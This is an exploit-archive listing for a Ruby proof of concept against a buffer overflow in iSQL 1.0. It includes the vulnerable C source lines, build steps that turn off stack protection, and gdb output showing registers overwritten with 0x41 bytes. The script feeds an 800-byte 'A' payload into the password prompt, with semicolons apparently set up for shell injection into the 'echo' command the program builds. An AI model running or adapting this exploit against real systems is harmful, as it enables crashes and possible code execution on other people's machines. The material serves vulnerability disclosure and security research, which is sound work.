iSQL 1.0 Buffer Overflow

iSQL 1.0 Buffer Overflow: Posted Jun 13, 2016; Authored by HaHwul; iSQL version 1.0 suffers from a buffer overflow vulnerability.; tags | exploit, overflow; SHA-256 | 9c4f4323c6e410f10df86e0bf99e7338c3fd903870baadce9dd7cc5634c565e8; Download | Favorite | View

iSQL 1.0 Buffer Overflow

#!/bin/ruby
# Exploit Title: iSQL(RL) 1.0 - Buffer Overflow(isql_main.c)
# Date: 2016-06-13
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/roselone/iSQL
# Software Link: https://github.com/roselone/iSQL/archive/master.zip
# Version: 1.0
# Tested on: Debian [wheezy]
# CVE : none
=begin
### Vulnerability Point
 :: [isql_main.c 453 line] strcpy((char *)cmd+5,str); code is vulnerable
 :: don't check str size
446 char *get_MD5(char *str){
447         FILE *stream;
448         char *buf=malloc(sizeof(char)*33);
449         char cmd[100];
450         memset(buf,'\0',sizeof(buf));
451         memset(cmd,'\0',sizeof(cmd));
452         strcpy(cmd,"echo "); //5
453         strcpy((char *)cmd+5,str);

Edit makefile > CFLAGS = -fno-stack-protector
#> make

### gdb history
(gdb) r
Starting program: /home/noon/Noon/LAB/exploit/vuln_test/iSQL/isql

*************** welcome to ISQL ****************
* version 1.0                                  *
* Designed by RL                               *
* Copyright (c) 2011, RL. All rights reserved  *
************************************************

>username: hwul_test
>password: AAAAAAAAAAAAAAAAAAAAAAAAAA...  ("A" * 800)
Program received signal SIGSEGV, Segmentation fault.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0x000000000040644c in get_MD5 ()

(gdb) x/s $rax
0x4141414141414141:     <error: Cannot access memory at address 0x4141414141414141>

(gdb) x/s $rbp
0x4141414141414141:     <error: Cannot access memory at address 0x4141414141414141>

### Registers
(gdb) i r
rax            0x4141414141414141       4702111234474983745
rbx            0x0      0
rcx            0x7ffff7b06480   140737348920448
rdx            0x0      0
rsi            0x60b610 6338064
rdi            0x5      5
rbp            0x4141414141414141       0x4141414141414141
rsp            0x7fffffffe948   0x7fffffffe948
r8             0xffffffff       4294967295
r9             0x0    
=end
puts "iSQL 1.0 - Buffer Overflow"
puts " - by hahwul"
puts " - Run BUG.."
buffer = "A"*800 
system("(sleep 5; echo -en 'hwul\n';sleep 1;echo -en 'asdf;#{buffer};echo 1';sleep 10) | ./isql")

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

iSQL 1.0 Buffer Overflow

iSQL 1.0 Buffer Overflow

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

iSQL 1.0 Buffer Overflow

Share This

iSQL 1.0 Buffer Overflow

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems